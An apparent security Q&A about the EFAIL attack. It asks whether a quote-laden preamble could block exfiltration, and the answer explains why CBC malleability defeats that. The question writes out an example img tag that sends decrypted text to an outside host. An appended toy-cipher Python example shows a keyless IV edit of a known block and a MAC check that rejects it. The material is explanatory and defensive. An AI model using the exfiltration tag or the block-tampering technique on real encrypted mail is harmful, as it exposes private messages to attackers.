
The way I understand EFAIL, the attack works because email clients can be coerced into concatenating the decrypted message into text supplied by the attacker to result in a URL.

But wouldn't it be a counter-measure to use a suitable preamble with each secret message sent, such as

nice try " '
Secret meeting 
Tomorrow 9pm

? The way I understand the attack(s), this would result in something like

<img src="http://efail.de/nice%20try%" ' Secret meeting Tomorrow 9pm">

i.e., an img tag that is probably not even valid and exfiltrates only the initial "nice try" to the attacker.

Mike Ounsworth
Hagen von Eitzen

1 Answer


That may work on some naive EFAIL attacks, but

  1. the last page of the EFAIL whitepaper lists a number of known variants of EFAIL; most - but not all - rely on malicious HTML tags and quote characters. (Note in particular the last one that does it through the email headers.)
  2. My understanding is that due to how AES_CBC works, the attacker gets to choose where in the email to insert the malicious <img> tag, so once they figure out your trick, they would insert it after the nice try " '.

Generally speaking, attacks like this are best thwarted by addressing the root cause rather than applying band-aid fixes in a never-ending game of whack-a-mole.

In the case of EFAIL, the root cause is email clients that render HTML content and follow external links even on untrusted content. The proper solution is for email client vendors to be more careful about using authenticated encryption (AES_GCM) and digital signatures.

The current behaviour of most email clients when a signature validation fails is to render the email, but put a warning banner at the top. I wonder if we will see that change as a result of EFAIL?

Mike Ounsworth
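The answer's second point, worked through as an added example (this is not code from the question, the answer or the EFAIL paper): a CBC message whose first block is the fixed preamble, an IV edit that swaps that known block for other text without knowing the key, and an encrypt-then-MAC check (the integrity guarantee AES-GCM gives) that refuses the edited message. The Feistel block cipher, keys and messages are constructed stand-ins.

```python
import hashlib
import hmac
BLOCK = 16

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _prp(key: bytes, block: bytes) -> bytes:
    # Toy 16-byte block permutation (4-round Feistel, SHA-256 round function) that
    # stands in for AES so this runs offline; CBC's malleability holds for any cipher.
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, xor(l, hashlib.sha256(key + bytes([i]) + r).digest()[:8])
    return l + r

def _prp_inv(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = xor(r, hashlib.sha256(key + bytes([i]) + l).digest()[:8]), l
    return l + r

def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    prev, out = iv, b""
    for i in range(0, len(pt), BLOCK):
        prev = _prp(key, xor(pt[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    prev, out = iv, b""
    for i in range(0, len(ct), BLOCK):
        out += xor(_prp_inv(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

def replace_known_first_block(iv: bytes, known: bytes, chosen: bytes) -> bytes:
    # CBC gives P0 = D(C0) XOR IV, so anyone who knows P0 (a fixed preamble) can pick
    # an IV that makes P0 decrypt to `chosen` while later blocks stay intact. No key needed.
    return xor(iv, xor(known, chosen))

def verify_then_decrypt(key: bytes, mac_key: bytes, iv: bytes, ct: bytes, tag: bytes):
    # Encrypt-then-MAC (AES-GCM gives the same guarantee): tampered input yields None, never plaintext.
    expected = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    return cbc_decrypt(key, iv, ct) if hmac.compare_digest(expected, tag) else None

PREAMBLE, SECRET = b'nice try " \'    ', b"Secret meeting  Tomorrow 9pm    "  # constructed, 16-byte blocks
KEY, MAC_KEY, IV = bytes(range(16)), bytes(range(16, 32)), bytes(range(32, 48))  # dummy keys
CT = cbc_encrypt(KEY, IV, PREAMBLE + SECRET)
TAG = hmac.new(MAC_KEY, IV + CT, hashlib.sha256).digest()
```

The unauthenticated decrypt hands back the edited first block with the secret blocks untouched, which is why a preamble cannot help; the verified decrypt returns None for the same input.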